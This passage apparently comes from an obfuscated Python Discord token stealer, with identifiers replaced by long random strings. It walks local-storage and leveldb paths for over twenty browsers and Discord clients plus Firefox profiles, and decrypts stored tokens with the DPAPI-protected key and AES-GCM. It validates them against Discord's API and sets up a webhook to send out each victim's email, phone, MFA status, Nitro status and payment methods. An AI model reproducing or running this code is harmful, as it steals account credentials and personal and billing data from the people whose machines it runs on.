            'Opera': JNSVSUOJGMZHPLAPGCUIZHPTNOAJMJEJAFWWUKVJYAOJVEVHZNJPYUXMBWTNXFW + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\',
            'Opera GX': JNSVSUOJGMZHPLAPGCUIZHPTNOAJMJEJAFWWUKVJYAOJVEVHZNJPYUXMBWTNXFW + '\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\',
            'Amigo': GDPXHYKAHJPMTNGSNZOFPIHAPBFSECVZRGQJWWKCNZYCZCBTXEXJWOSE + '\\Amigo\\User Data\\Local Storage\\leveldb\\',
            'Torch': GDPXHYKAHJPMTNGSNZOFPIHAPBFSECVZRGQJWWKCNZYCZCBTXEXJWOSE + '\\Torch\\User Data\\Local Storage\\leveldb\\',
            'Kometa': GDPXHYKAHJPMTNGSNZOFPIHAPBFSECVZRGQJWWKCNZYCZCBTXEXJWOSE + '\\Kometa\\User Data\\Local Storage\\leveldb\\',
            'Orbitum': GDPXHYKAHJPMTNGSNZOFPIHAPBFSECVZRGQJWWKCNZYCZCBTXEXJWOSE + '\\Orbitum\\User Data\\Local Storage\\leveldb\\',
            'CentBrowser': GDPXHYKAHJPMTNGSNZOFPIHAPBFSECVZRGQJWWKCNZYCZCBTXEXJWOSE + '\\CentBrowser\\User Data\\Local Storage\\leveldb\\',
            '7Star': GDPXHYKAHJPMTNGSNZOFPIHAPBFSECVZRGQJWWKCNZYCZCBTXEXJWOSE + '\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\',
            'Sputnik': GDPXHYKAHJPMTNGSNZOFPIHAPBFSECVZRGQJWWKCNZYCZCBTXEXJWOSE + '\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\',
            'Vivaldi': GDPXHYKAHJPMTNGSNZOFPIHAPBFSECVZRGQJWWKCNZYCZCBTXEXJWOSE + '\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome SxS': GDPXHYKAHJPMTNGSNZOFPIHAPBFSECVZRGQJWWKCNZYCZCBTXEXJWOSE + '\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\',
            'Google Chrome': GDPXHYKAHJPMTNGSNZOFPIHAPBFSECVZRGQJWWKCNZYCZCBTXEXJWOSE + '\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome1': GDPXHYKAHJPMTNGSNZOFPIHAPBFSECVZRGQJWWKCNZYCZCBTXEXJWOSE + '\\Google\\Chrome\\User Data\\Profile 1\\Local Storage\\leveldb\\',
            'Google Chrome2': GDPXHYKAHJPMTNGSNZOFPIHAPBFSECVZRGQJWWKCNZYCZCBTXEXJWOSE + '\\Google\\Chrome\\User Data\\Profile 2\\Local Storage\\leveldb\\',
            'Google Chrome3': GDPXHYKAHJPMTNGSNZOFPIHAPBFSECVZRGQJWWKCNZYCZCBTXEXJWOSE + '\\Google\\Chrome\\User Data\\Profile 3\\Local Storage\\leveldb\\',
            'Google Chrome4': GDPXHYKAHJPMTNGSNZOFPIHAPBFSECVZRGQJWWKCNZYCZCBTXEXJWOSE + '\\Google\\Chrome\\User Data\\Profile 4\\Local Storage\\leveldb\\',
            'Google Chrome5': GDPXHYKAHJPMTNGSNZOFPIHAPBFSECVZRGQJWWKCNZYCZCBTXEXJWOSE + '\\Google\\Chrome\\User Data\\Profile 5\\Local Storage\\leveldb\\',
            'Epic Privacy Browser': GDPXHYKAHJPMTNGSNZOFPIHAPBFSECVZRGQJWWKCNZYCZCBTXEXJWOSE + '\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\',
            'Microsoft Edge': GDPXHYKAHJPMTNGSNZOFPIHAPBFSECVZRGQJWWKCNZYCZCBTXEXJWOSE + '\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\',
            'Uran': GDPXHYKAHJPMTNGSNZOFPIHAPBFSECVZRGQJWWKCNZYCZCBTXEXJWOSE + '\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\',
            'Yandex': GDPXHYKAHJPMTNGSNZOFPIHAPBFSECVZRGQJWWKCNZYCZCBTXEXJWOSE + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Brave': GDPXHYKAHJPMTNGSNZOFPIHAPBFSECVZRGQJWWKCNZYCZCBTXEXJWOSE + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Iridium': GDPXHYKAHJPMTNGSNZOFPIHAPBFSECVZRGQJWWKCNZYCZCBTXEXJWOSE + '\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\'
        }

        for XRXOKJHQLAREIQZAMHEQBWTQCEZLTTOAPLCREWCHLFQOOGOUYMEOBHQUIIHFUOZPLPFJCAIBLKJDKPBFTIXUSLCMFWLEMRZU, BKZJSPCZZFXYVAHPLGEDCNXRQLQOBLXDGLXQOKHEDFCLIGHEMXETXBXNMMLXRDEOUZQTZXQ in UBLISNWYYKAEGWCYTTTPPEIJJRSIJPYLBHQSOQFUKDJPVWMNLNTXG.items():
            if not os.path.exists(BKZJSPCZZFXYVAHPLGEDCNXRQLQOBLXDGLXQOKHEDFCLIGHEMXETXBXNMMLXRDEOUZQTZXQ):
                continue
            VWOFMRXCEPEUPCPKEVOHIJHGFIIZXSXPDIDLLSSGZOJCGPDJOTDYMJNDFQKAMIQPMEECCNYFABUTMPEWU = XRXOKJHQLAREIQZAMHEQBWTQCEZLTTOAPLCREWCHLFQOOGOUYMEOBHQUIIHFUOZPLPFJCAIBLKJDKPBFTIXUSLCMFWLEMRZU.replace(" ", "").lower()
            if "cord" in BKZJSPCZZFXYVAHPLGEDCNXRQLQOBLXDGLXQOKHEDFCLIGHEMXETXBXNMMLXRDEOUZQTZXQ:
                if not os.path.exists(JNSVSUOJGMZHPLAPGCUIZHPTNOAJMJEJAFWWUKVJYAOJVEVHZNJPYUXMBWTNXFW + f'\\{VWOFMRXCEPEUPCPKEVOHIJHGFIIZXSXPDIDLLSSGZOJCGPDJOTDYMJNDFQKAMIQPMEECCNYFABUTMPEWU}\\Local State'):
                    continue
                for v4r_file_name in os.listdir(BKZJSPCZZFXYVAHPLGEDCNXRQLQOBLXDGLXQOKHEDFCLIGHEMXETXBXNMMLXRDEOUZQTZXQ):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{BKZJSPCZZFXYVAHPLGEDCNXRQLQOBLXDGLXQOKHEDFCLIGHEMXETXBXNMMLXRDEOUZQTZXQ}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for y in re.findall(FBIRSITFELIFKCCLZNZVHTSFKTXEOFEYMLUSMCWTGJXYIILHSKY_enc, v4r_line.strip()):
                                BTVNMRXGSTOJXQWGASWIWCABEIGLJHKUZABABZXXIJKGBCFRXFOTSHPIZWOZ = YAXLAAFJQPGNVUILDYUCMUXENFYPFWYDVRFUQVTKQWGSVPEMUJHBBGKSWTSRKGLCVHIBFNTBBSBEZKINXUSPJNOAAKMMGJLEHTVal(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), XFAXAUQAGGAIQGLNMUBRYTIZNIDRYDRNALDEUGCXEQCAAFNSPCXBEFDPDHVIDCIGCWWRILDIBDBJZRCDYEUGD(JNSVSUOJGMZHPLAPGCUIZHPTNOAJMJEJAFWWUKVJYAOJVEVHZNJPYUXMBWTNXFW + f'\\{VWOFMRXCEPEUPCPKEVOHIJHGFIIZXSXPDIDLLSSGZOJCGPDJOTDYMJNDFQKAMIQPMEECCNYFABUTMPEWU}\\Local State'))
                                if TQXHBJDTFMVIYEKBWGLFOSQBVTGHYMZORECSSZCAVEJVUKYXZALDDZMUOLGZQMPIGDFPWJZDCTHUTUYSAJXPGXVDBAAFPFINXVU(BTVNMRXGSTOJXQWGASWIWCABEIGLJHKUZABABZXXIJKGBCFRXFOTSHPIZWOZ, TUNPWYUPSJXKNQZLAABNQMQPEJHVAHXNUWZXVVYKLUGLYKCCOFLLQCHDHNPQRBCJDCDUAPMQBSEKHJPACOBAOEFMHMN):
                                    VGUFAMJLMHQQAOCWYCZEJSCEUMUDVIKRUXPVJXUUJEXJMZEWLAOIISFYE = requests.get(TUNPWYUPSJXKNQZLAABNQMQPEJHVAHXNUWZXVVYKLUGLYKCCOFLLQCHDHNPQRBCJDCDUAPMQBSEKHJPACOBAOEFMHMN, headers={'Authorization': BTVNMRXGSTOJXQWGASWIWCABEIGLJHKUZABABZXXIJKGBCFRXFOTSHPIZWOZ}).json()['id']
                                    if VGUFAMJLMHQQAOCWYCZEJSCEUMUDVIKRUXPVJXUUJEXJMZEWLAOIISFYE not in EMTREWQZMUEVWSEFBXURHFWNUZIKPGAHKRFBENFEUCRDFSYEXUGJSEJWHTLFPEIBLZKYKP:
                                        CVEKQRZCXJWZOYVQQNUWJSNYKPASWYIMRHSURJILQNYKVJRPSCIPAUWJHWDYWYSNEGRZKYHPXGOBALXDWKGX.append(BTVNMRXGSTOJXQWGASWIWCABEIGLJHKUZABABZXXIJKGBCFRXFOTSHPIZWOZ)
                                        EMTREWQZMUEVWSEFBXURHFWNUZIKPGAHKRFBENFEUCRDFSYEXUGJSEJWHTLFPEIBLZKYKP.append(VGUFAMJLMHQQAOCWYCZEJSCEUMUDVIKRUXPVJXUUJEXJMZEWLAOIISFYE)
                                        YBJCKHDEGNMIBHQKKROGKHHFOYMIUJMVEZRRZFIBKXRIVZDLSPQPHRZREMYR[BTVNMRXGSTOJXQWGASWIWCABEIGLJHKUZABABZXXIJKGBCFRXFOTSHPIZWOZ] = (XRXOKJHQLAREIQZAMHEQBWTQCEZLTTOAPLCREWCHLFQOOGOUYMEOBHQUIIHFUOZPLPFJCAIBLKJDKPBFTIXUSLCMFWLEMRZU, f"{BKZJSPCZZFXYVAHPLGEDCNXRQLQOBLXDGLXQOKHEDFCLIGHEMXETXBXNMMLXRDEOUZQTZXQ}\\{v4r_file_name}")
            else:
                for v4r_file_name in os.listdir(BKZJSPCZZFXYVAHPLGEDCNXRQLQOBLXDGLXQOKHEDFCLIGHEMXETXBXNMMLXRDEOUZQTZXQ):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{BKZJSPCZZFXYVAHPLGEDCNXRQLQOBLXDGLXQOKHEDFCLIGHEMXETXBXNMMLXRDEOUZQTZXQ}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for BTVNMRXGSTOJXQWGASWIWCABEIGLJHKUZABABZXXIJKGBCFRXFOTSHPIZWOZ in re.findall(FBIRSITFELIFKCCLZNZVHTSFKTXEOFEYMLUSMCWTGJXYIILHSKY, v4r_line.strip()):
                                if TQXHBJDTFMVIYEKBWGLFOSQBVTGHYMZORECSSZCAVEJVUKYXZALDDZMUOLGZQMPIGDFPWJZDCTHUTUYSAJXPGXVDBAAFPFINXVU(BTVNMRXGSTOJXQWGASWIWCABEIGLJHKUZABABZXXIJKGBCFRXFOTSHPIZWOZ, TUNPWYUPSJXKNQZLAABNQMQPEJHVAHXNUWZXVVYKLUGLYKCCOFLLQCHDHNPQRBCJDCDUAPMQBSEKHJPACOBAOEFMHMN):
                                    VGUFAMJLMHQQAOCWYCZEJSCEUMUDVIKRUXPVJXUUJEXJMZEWLAOIISFYE = requests.get(TUNPWYUPSJXKNQZLAABNQMQPEJHVAHXNUWZXVVYKLUGLYKCCOFLLQCHDHNPQRBCJDCDUAPMQBSEKHJPACOBAOEFMHMN, headers={'Authorization': BTVNMRXGSTOJXQWGASWIWCABEIGLJHKUZABABZXXIJKGBCFRXFOTSHPIZWOZ}).json()['id']
                                    if VGUFAMJLMHQQAOCWYCZEJSCEUMUDVIKRUXPVJXUUJEXJMZEWLAOIISFYE not in EMTREWQZMUEVWSEFBXURHFWNUZIKPGAHKRFBENFEUCRDFSYEXUGJSEJWHTLFPEIBLZKYKP:
                                        CVEKQRZCXJWZOYVQQNUWJSNYKPASWYIMRHSURJILQNYKVJRPSCIPAUWJHWDYWYSNEGRZKYHPXGOBALXDWKGX.append(BTVNMRXGSTOJXQWGASWIWCABEIGLJHKUZABABZXXIJKGBCFRXFOTSHPIZWOZ)
                                        EMTREWQZMUEVWSEFBXURHFWNUZIKPGAHKRFBENFEUCRDFSYEXUGJSEJWHTLFPEIBLZKYKP.append(VGUFAMJLMHQQAOCWYCZEJSCEUMUDVIKRUXPVJXUUJEXJMZEWLAOIISFYE)
                                        YBJCKHDEGNMIBHQKKROGKHHFOYMIUJMVEZRRZFIBKXRIVZDLSPQPHRZREMYR[BTVNMRXGSTOJXQWGASWIWCABEIGLJHKUZABABZXXIJKGBCFRXFOTSHPIZWOZ] = (XRXOKJHQLAREIQZAMHEQBWTQCEZLTTOAPLCREWCHLFQOOGOUYMEOBHQUIIHFUOZPLPFJCAIBLKJDKPBFTIXUSLCMFWLEMRZU, f"{BKZJSPCZZFXYVAHPLGEDCNXRQLQOBLXDGLXQOKHEDFCLIGHEMXETXBXNMMLXRDEOUZQTZXQ}\\{v4r_file_name}")

        if os.path.exists(JNSVSUOJGMZHPLAPGCUIZHPTNOAJMJEJAFWWUKVJYAOJVEVHZNJPYUXMBWTNXFW + "\\Mozilla\\Firefox\\Profiles"):
            for BKZJSPCZZFXYVAHPLGEDCNXRQLQOBLXDGLXQOKHEDFCLIGHEMXETXBXNMMLXRDEOUZQTZXQ, _, v4r_files in os.walk(JNSVSUOJGMZHPLAPGCUIZHPTNOAJMJEJAFWWUKVJYAOJVEVHZNJPYUXMBWTNXFW + "\\Mozilla\\Firefox\\Profiles"):
                for v4r__file in v4r_files:
                    if v4r__file.endswith('.sqlite'):
                        with open(f'{BKZJSPCZZFXYVAHPLGEDCNXRQLQOBLXDGLXQOKHEDFCLIGHEMXETXBXNMMLXRDEOUZQTZXQ}\\{v4r__file}', errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for BTVNMRXGSTOJXQWGASWIWCABEIGLJHKUZABABZXXIJKGBCFRXFOTSHPIZWOZ in re.findall(FBIRSITFELIFKCCLZNZVHTSFKTXEOFEYMLUSMCWTGJXYIILHSKY, v4r_line.strip()):
                                    if TQXHBJDTFMVIYEKBWGLFOSQBVTGHYMZORECSSZCAVEJVUKYXZALDDZMUOLGZQMPIGDFPWJZDCTHUTUYSAJXPGXVDBAAFPFINXVU(BTVNMRXGSTOJXQWGASWIWCABEIGLJHKUZABABZXXIJKGBCFRXFOTSHPIZWOZ, TUNPWYUPSJXKNQZLAABNQMQPEJHVAHXNUWZXVVYKLUGLYKCCOFLLQCHDHNPQRBCJDCDUAPMQBSEKHJPACOBAOEFMHMN):
                                        VGUFAMJLMHQQAOCWYCZEJSCEUMUDVIKRUXPVJXUUJEXJMZEWLAOIISFYE = requests.get(TUNPWYUPSJXKNQZLAABNQMQPEJHVAHXNUWZXVVYKLUGLYKCCOFLLQCHDHNPQRBCJDCDUAPMQBSEKHJPACOBAOEFMHMN, headers={'Authorization': BTVNMRXGSTOJXQWGASWIWCABEIGLJHKUZABABZXXIJKGBCFRXFOTSHPIZWOZ}).json()['id']
                                        if VGUFAMJLMHQQAOCWYCZEJSCEUMUDVIKRUXPVJXUUJEXJMZEWLAOIISFYE not in EMTREWQZMUEVWSEFBXURHFWNUZIKPGAHKRFBENFEUCRDFSYEXUGJSEJWHTLFPEIBLZKYKP:
                                            CVEKQRZCXJWZOYVQQNUWJSNYKPASWYIMRHSURJILQNYKVJRPSCIPAUWJHWDYWYSNEGRZKYHPXGOBALXDWKGX.append(BTVNMRXGSTOJXQWGASWIWCABEIGLJHKUZABABZXXIJKGBCFRXFOTSHPIZWOZ)
                                            EMTREWQZMUEVWSEFBXURHFWNUZIKPGAHKRFBENFEUCRDFSYEXUGJSEJWHTLFPEIBLZKYKP.append(VGUFAMJLMHQQAOCWYCZEJSCEUMUDVIKRUXPVJXUUJEXJMZEWLAOIISFYE)
                                            YBJCKHDEGNMIBHQKKROGKHHFOYMIUJMVEZRRZFIBKXRIVZDLSPQPHRZREMYR[BTVNMRXGSTOJXQWGASWIWCABEIGLJHKUZABABZXXIJKGBCFRXFOTSHPIZWOZ] = ('Firefox', f"{BKZJSPCZZFXYVAHPLGEDCNXRQLQOBLXDGLXQOKHEDFCLIGHEMXETXBXNMMLXRDEOUZQTZXQ}\\{v4r__file}")
        return CVEKQRZCXJWZOYVQQNUWJSNYKPASWYIMRHSURJILQNYKVJRPSCIPAUWJHWDYWYSNEGRZKYHPXGOBALXDWKGX, YBJCKHDEGNMIBHQKKROGKHHFOYMIUJMVEZRRZFIBKXRIVZDLSPQPHRZREMYR

    def TQXHBJDTFMVIYEKBWGLFOSQBVTGHYMZORECSSZCAVEJVUKYXZALDDZMUOLGZQMPIGDFPWJZDCTHUTUYSAJXPGXVDBAAFPFINXVU(BTVNMRXGSTOJXQWGASWIWCABEIGLJHKUZABABZXXIJKGBCFRXFOTSHPIZWOZ, TUNPWYUPSJXKNQZLAABNQMQPEJHVAHXNUWZXVVYKLUGLYKCCOFLLQCHDHNPQRBCJDCDUAPMQBSEKHJPACOBAOEFMHMN):
        return requests.get(TUNPWYUPSJXKNQZLAABNQMQPEJHVAHXNUWZXVVYKLUGLYKCCOFLLQCHDHNPQRBCJDCDUAPMQBSEKHJPACOBAOEFMHMN, headers={'Authorization': BTVNMRXGSTOJXQWGASWIWCABEIGLJHKUZABABZXXIJKGBCFRXFOTSHPIZWOZ}).status_code == 200

    def YAXLAAFJQPGNVUILDYUCMUXENFYPFWYDVRFUQVTKQWGSVPEMUJHBBGKSWTSRKGLCVHIBFNTBBSBEZKINXUSPJNOAAKMMGJLEHTVal(XUEGSJLGVCZDYJFHGSLNQOPSEBLKABTVNFCIPWNGPTYPEZIJXXVQJMFZSODOHORLQERLFIEWIKUDQJDRDVZCMMXZZUFWXIUWEG, XTDFCRRNVVWHZIOGIONAYDZPTSMJSSSTFLVZMOUCXNDNBYXKEVRIGDRFABZEOXEB):
        IBWQDARPPPTNCICGXBYRFXIXXHIXTWWGGNJUPVZDRXHQMUJOCKZSPOEFNYQCWHRNOGCAXVWBCEXBSAEUCTTGWICWFKY = XUEGSJLGVCZDYJFHGSLNQOPSEBLKABTVNFCIPWNGPTYPEZIJXXVQJMFZSODOHORLQERLFIEWIKUDQJDRDVZCMMXZZUFWXIUWEG[3:15]
        WUCPLSWIIISOLZFVCFXGWPSDWTHFOLBSBJMQWNZFYQFWAHLWWATPQDDWICHUVRCMFGICGBMATUJEFCWSAXCZSCBM = XUEGSJLGVCZDYJFHGSLNQOPSEBLKABTVNFCIPWNGPTYPEZIJXXVQJMFZSODOHORLQERLFIEWIKUDQJDRDVZCMMXZZUFWXIUWEG[15:]
        FVTLYZIDPICRHRSSPGGYCFKOKTKJPWBWPUGIPFTVFUOLOMYRGBNUZBKYPOXRLIANDI = AES.new(XTDFCRRNVVWHZIOGIONAYDZPTSMJSSSTFLVZMOUCXNDNBYXKEVRIGDRFABZEOXEB, AES.MODE_GCM, IBWQDARPPPTNCICGXBYRFXIXXHIXTWWGGNJUPVZDRXHQMUJOCKZSPOEFNYQCWHRNOGCAXVWBCEXBSAEUCTTGWICWFKY)
        return FVTLYZIDPICRHRSSPGGYCFKOKTKJPWBWPUGIPFTVFUOLOMYRGBNUZBKYPOXRLIANDI.decrypt(WUCPLSWIIISOLZFVCFXGWPSDWTHFOLBSBJMQWNZFYQFWAHLWWATPQDDWICHUVRCMFGICGBMATUJEFCWSAXCZSCBM)[:-16].decode()

    def XFAXAUQAGGAIQGLNMUBRYTIZNIDRYDRNALDEUGCXEQCAAFNSPCXBEFDPDHVIDCIGCWWRILDIBDBJZRCDYEUGD(BKZJSPCZZFXYVAHPLGEDCNXRQLQOBLXDGLXQOKHEDFCLIGHEMXETXBXNMMLXRDEOUZQTZXQ):
        if not os.path.exists(BKZJSPCZZFXYVAHPLGEDCNXRQLQOBLXDGLXQOKHEDFCLIGHEMXETXBXNMMLXRDEOUZQTZXQ):
            return None
        with open(BKZJSPCZZFXYVAHPLGEDCNXRQLQOBLXDGLXQOKHEDFCLIGHEMXETXBXNMMLXRDEOUZQTZXQ, "r", encoding="utf-8") as v4r_f:
            CYZXPVFDDHREGEUEQGQGFPWPPDFGCDEQPMLKLYHOMYZJJKEBOHNGIJUVZKDMLDBWCUPDGZIQAXDIRKVKWB = json.load(v4r_f)
        XTDFCRRNVVWHZIOGIONAYDZPTSMJSSSTFLVZMOUCXNDNBYXKEVRIGDRFABZEOXEB = base64.b64decode(CYZXPVFDDHREGEUEQGQGFPWPPDFGCDEQPMLKLYHOMYZJJKEBOHNGIJUVZKDMLDBWCUPDGZIQAXDIRKVKWB["os_crypt"]["encrypted_key"])[5:]
        return CryptUnprotectData(XTDFCRRNVVWHZIOGIONAYDZPTSMJSSSTFLVZMOUCXNDNBYXKEVRIGDRFABZEOXEB, None, None, None, 0)[1]

    CVEKQRZCXJWZOYVQQNUWJSNYKPASWYIMRHSURJILQNYKVJRPSCIPAUWJHWDYWYSNEGRZKYHPXGOBALXDWKGX, YBJCKHDEGNMIBHQKKROGKHHFOYMIUJMVEZRRZFIBKXRIVZDLSPQPHRZREMYR = OCFGKJYGNMDMPQFVVUBOVRBDYVRZZLJTGMCUVYTGZXTNSMCBJVGGCFVWVBRZNHMJHKDNDDY()
    UVFBPFHFGZAPYHOFKWHMEPFVVVTEGMBCGYARZVJSHEQQGNZKOSBVKCYUBMGRTUFQKWBBAIWBFYEFONEBPSYCTQQTZHY = SyncWebhook.from_url(UOWXOTBXLCGVMGVSJTFTIWEPLKECGUQIZXXFXIQCNQKNPYKNVVEQPPISVRIKBSYVZ)

    if not CVEKQRZCXJWZOYVQQNUWJSNYKPASWYIMRHSURJILQNYKVJRPSCIPAUWJHWDYWYSNEGRZKYHPXGOBALXDWKGX:
        MTLNOKXXYEPAFGCOPBZBWKSLJOBADOGJAMQWVKGRAOXQFSZYVRYJQRPQMHYGXQQLZPTLLTNSXKWYLDCUSF(
            UOWXOTBXLCGVMGVSJTFTIWEPLKECGUQIZXXFXIQCNQKNPYKNVVEQPPISVRIKBSYVZ, 
            title=f'Discord Token {TYLFBQTVURAEDBAFSETVLKPIXLEXWBQDMNHCMZXNRJXYGUTFBLDVXGOWEGVVWNY}:', 
            description=f"No discord tokens found."
        )
        return
    
    for BTVNMRXGSTOJXQWGASWIWCABEIGLJHKUZABABZXXIJKGBCFRXFOTSHPIZWOZ_d15c0rd in CVEKQRZCXJWZOYVQQNUWJSNYKPASWYIMRHSURJILQNYKVJRPSCIPAUWJHWDYWYSNEGRZKYHPXGOBALXDWKGX:
        CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE = requests.get('https://discord.com/api/v8/users/@me', headers={'Authorization': BTVNMRXGSTOJXQWGASWIWCABEIGLJHKUZABABZXXIJKGBCFRXFOTSHPIZWOZ_d15c0rd}).json()

        APPEMRPPRKLGQVJRZBIUMEOHUFVXDHJWQFSQPYMOIIJAWEEDLQTZQGOTFXTCHMPSBLCPSSMLBPMZRRNIGDDUKDJDPUGXNDJV = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('username', "None") + '#' + CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('discriminator', "None")
        OJYRWDTQYIUNXSSKFYYPXAQMFHXCXIRMGDZGLTEDZNXWYLSBLKKD = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('global_name', "None")
        IFPJZROAVYVROBAJAWYWPTPRMNWBXKJHTAWABBHXHQFHGKMBGYPVJTQBFDVANAERDSFIAQIZCERECRZY = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('id', "None")
        PVTJWTLLGUBIGVFPVERKRIPCRJSIETAREQQWFBORMTSJIMPMBIUWGBIPOBCUASLKRYRSXP = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('email', "None")
        PFAPDUSRKLDRMDCHZUIZEQFKXKVHJTUOUMFQLNHPTFYFDTQDEXHSLXKMNPBPPGEGYOAUZLMEJ = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('verified', "None")
        KVVCXHFKCNXPPBXKAZRERJGOWSLBFBRUTRNXOQESWOUXHAEFMFHWTWIRAUNQG = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('phone', "None")
        HGQOZTTNYVIMBIVUOSLFBLRARXYAMPEZHMXJZGOUXHDJQABGTVHBJXZGISH = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('locale', "None")
        EOUSBZWPOYNJKJTBOEHPICAGWJINTLQGIHUEGDUNLINOTUNFGOFIQJZRXLTJU = CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('mfa_enabled', "None")

        try:
            if CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('premium_type', 'None') == 0:
                BJRRAJAULLGHAFXWRVVCTWAEFUTGIZGZDVDDVATFHJPQWHTWFPPLWSHSMOLXLOEYCKJBSECTWILWAZYAYBRAWQCS = 'False'
            elif CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('premium_type', 'None') == 1:
                BJRRAJAULLGHAFXWRVVCTWAEFUTGIZGZDVDDVATFHJPQWHTWFPPLWSHSMOLXLOEYCKJBSECTWILWAZYAYBRAWQCS = 'Nitro Classic'
            elif CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('premium_type', 'None') == 2:
                BJRRAJAULLGHAFXWRVVCTWAEFUTGIZGZDVDDVATFHJPQWHTWFPPLWSHSMOLXLOEYCKJBSECTWILWAZYAYBRAWQCS = 'Nitro Boosts'
            elif CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE.get('premium_type', 'None') == 3:
                BJRRAJAULLGHAFXWRVVCTWAEFUTGIZGZDVDDVATFHJPQWHTWFPPLWSHSMOLXLOEYCKJBSECTWILWAZYAYBRAWQCS = 'Nitro Basic'
            else:
                BJRRAJAULLGHAFXWRVVCTWAEFUTGIZGZDVDDVATFHJPQWHTWFPPLWSHSMOLXLOEYCKJBSECTWILWAZYAYBRAWQCS = 'False'
        except:
            BJRRAJAULLGHAFXWRVVCTWAEFUTGIZGZDVDDVATFHJPQWHTWFPPLWSHSMOLXLOEYCKJBSECTWILWAZYAYBRAWQCS = "None"

        try: 
            IOJGQGFZSEUOTSCCBKPJBGFZTTWGAZELEAVQNLSOGJIVBWFLLNHOBUOFYHFPBRWWAMJWSJAHNTCUWSJYNQB = f"https://cdn.discordapp.com/avatars/{IFPJZROAVYVROBAJAWYWPTPRMNWBXKJHTAWABBHXHQFHGKMBGYPVJTQBFDVANAERDSFIAQIZCERECRZY}/{CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE['avatar']}.gif" if requests.get(f"https://cdn.discordapp.com/avatars/{IFPJZROAVYVROBAJAWYWPTPRMNWBXKJHTAWABBHXHQFHGKMBGYPVJTQBFDVANAERDSFIAQIZCERECRZY}/{CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE['avatar']}.gif").status_code == 200 else f"https://cdn.discordapp.com/avatars/{IFPJZROAVYVROBAJAWYWPTPRMNWBXKJHTAWABBHXHQFHGKMBGYPVJTQBFDVANAERDSFIAQIZCERECRZY}/{CPLTCLQMXCRIWIQAHPTKGVIREAKEHMIMYIQKYFVXTDEKZLPSTCMEMLE['avatar']}.png"
        except: 
            IOJGQGFZSEUOTSCCBKPJBGFZTTWGAZELEAVQNLSOGJIVBWFLLNHOBUOFYHFPBRWWAMJWSJAHNTCUWSJYNQB = AGCWWPPELOWOBUYKLTVWMLSRFFABYYSOVKCBKXUFXYOROIKXYEJIHJGLTSOXRICDUJNMRH

        try:
            CQRKOSGHQZXNWLIBUTASSVEFKSQRWKZPOCFMTJVEUHDYFRXNAQAKWCREMRHVBMIKYSEDHWUKGUYWSVHQEQMLANHS = requests.get('https://discord.com/api/v6/users/@me/billing/payment-sources', headers={'Authorization': BTVNMRXGSTOJXQWGASWIWCABEIGLJHKUZABABZXXIJKGBCFRXFOTSHPIZWOZ_d15c0rd}).json()
            if CQRKOSGHQZXNWLIBUTASSVEFKSQRWKZPOCFMTJVEUHDYFRXNAQAKWCREMRHVBMIKYSEDHWUKGUYWSVHQEQMLANHS:
                LLGEMQWTFCWCOABGKZESLSXZLRNFGYPCNABLUINCJQEXPZRBBYNOIELNUMUQNUQOCXXMCDPZXZQJCABLLODCBSYM = []

                for v4r_method in CQRKOSGHQZXNWLIBUTASSVEFKSQRWKZPOCFMTJVEUHDYFRXNAQAKWCREMRHVBMIKYSEDHWUKGUYWSVHQEQMLANHS:
                    if v4r_method['type'] == 1:
                        LLGEMQWTFCWCOABGKZESLSXZLRNFGYPCNABLUINCJQEXPZRBBYNOIELNUMUQNUQOCXXMCDPZXZQJCABLLODCBSYM.append('CB')
                    elif v4r_method['type'] == 2:
                        LLGEMQWTFCWCOABGKZESLSXZLRNFGYPCNABLUINCJQEXPZRBBYNOIELNUMUQNUQOCXXMCDPZXZQJCABLLODCBSYM.append("Paypal")
                    else:
